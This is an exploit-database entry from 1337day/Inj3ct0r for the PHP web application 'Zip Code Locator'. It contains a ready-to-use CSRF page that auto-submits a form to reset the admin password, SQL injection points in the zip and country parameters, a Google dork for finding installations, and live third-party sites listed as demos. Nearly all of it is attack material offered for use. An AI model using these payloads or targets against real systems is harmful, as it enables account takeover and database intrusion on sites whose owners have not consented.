Full title: Zip Code Locator - CSRF/SQLi Vulnerabilities 
Category: web applications
Platform: php
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /&#039; \            __  /&#039;__`\        /\ \__  /&#039;__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /&#039; _ `\ \/\ \/_/_\_&lt;_  /&#039;___\ \ \/\ \ \ \ \/\`&#039;__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I&#039;m DaOne member from Inj3ct0r Team                    1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
##########################################
# Exploit Title: Zip Code Locator - CSRF/SQLi Vulnerabilities
# Date: 2012-10-19
# Author: DaOne aka Mocking Bird
# Home: 1337day Inj3ct0r Exploit Database 
# Software Link: http://www.lookuprunner.com
# Category: webapps/php
# Version: 1.3.1-&gt; 1.3.13 
# Price: $149
# Google dork: O_o intext:&quot;Zip Code Locator by Lookup Runner&quot;
##########################################
[#] [CSRF Change Admin Password]:
&lt;html&gt;
&lt;body onload=&quot;document.form.submit();&quot;&gt;
&lt;form action=&quot;http://[target]/index.php&quot; method=&quot;post&quot; name=&quot;form&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;email&quot; value=&quot;admin@email.com&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;new_password&quot; value=&quot;passw0rd&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;new_password2&quot; value=&quot;passw0rd&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;panel&quot; value=&quot;admin/profile&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;action&quot; value=&quot;update&quot;&gt;
&lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;

[#] [SQL Injection]:
http://[host]/index.php?zip=[Error Based Injection]
http://[host]/index.php?zip=60070&amp;country=[Error Based Injection]
# Demo:
http://www.lookuprunner.com/demo/?zip=60070&amp;within=25&amp;country=1
http://www.galaxyfireworks.com/zip/?zip=60070&amp;within=25&amp;country=1
http://www.fixingyou.net/search/?zip=1
#
Thanks to: TheGreaTTeAm/LCA and Inj3ct0r Team.

# 0day.today @ http://0day.today/